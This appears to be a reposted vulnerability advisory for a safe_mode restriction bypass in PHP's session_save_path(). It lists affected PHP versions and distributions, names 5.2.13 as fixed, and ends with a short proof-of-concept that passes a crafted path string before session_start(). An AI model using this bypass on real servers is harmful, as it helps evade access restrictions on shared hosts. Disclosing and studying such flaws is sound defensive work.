PHP 'session_save_path()' 'safe_mode' Restriction-Bypass Vulnerability

======================================================================
PHP 'session_save_path()' 'safe_mode' Restriction-Bypass Vulnerability
======================================================================


Vulnerable:  	 PHP PHP 5.3.1
PHP PHP 5.3
PHP PHP 5.2.12
PHP PHP 5.2.11
PHP PHP 5.2.10
PHP PHP 5.2.9 -2
PHP PHP 5.2.9
PHP PHP 5.2.8
PHP PHP 5.2.7
PHP PHP 5.2.6
PHP PHP 5.2.5
PHP PHP 5.2.4
PHP PHP 5.2.3
PHP PHP 5.2.2
PHP PHP 5.2.1
+ Ubuntu Ubuntu Linux 7.04 sparc
+ Ubuntu Ubuntu Linux 7.04 powerpc
+ Ubuntu Ubuntu Linux 7.04 i386
+ Ubuntu Ubuntu Linux 7.04 amd64
PHP PHP 5.2
+ Debian Linux 4.0 sparc
+ Debian Linux 4.0 s/390
+ Debian Linux 4.0 powerpc
+ Debian Linux 4.0 mipsel
+ Debian Linux 4.0 mips
+ Debian Linux 4.0 m68k
+ Debian Linux 4.0 ia-64
+ Debian Linux 4.0 ia-32
+ Debian Linux 4.0 hppa
+ Debian Linux 4.0 arm
+ Debian Linux 4.0 amd64
+ Debian Linux 4.0 alpha
+ Debian Linux 4.0
MandrakeSoft Linux Mandrake 2010.0 x86_64
MandrakeSoft Linux Mandrake 2010.0
MandrakeSoft Linux Mandrake 2009.1 x86_64
MandrakeSoft Linux Mandrake 2009.1
MandrakeSoft Linux Mandrake 2009.0 x86_64
MandrakeSoft Linux Mandrake 2009.0
MandrakeSoft Linux Mandrake 2008.0 x86_64
MandrakeSoft Linux Mandrake 2008.0
MandrakeSoft Enterprise Server 5 x86_64
MandrakeSoft Enterprise Server 5
MandrakeSoft Corporate Server 4.0 x86_64
MandrakeSoft Corporate Server 4.0
Not Vulnerable: 	PHP PHP 5.2.13 


To exploit this issue, an attacker can use readily available tools.

{

session_save_path(";;/byp/;a/../../humhum");
session_start();

}




#  0day.today [2018-01-04]  #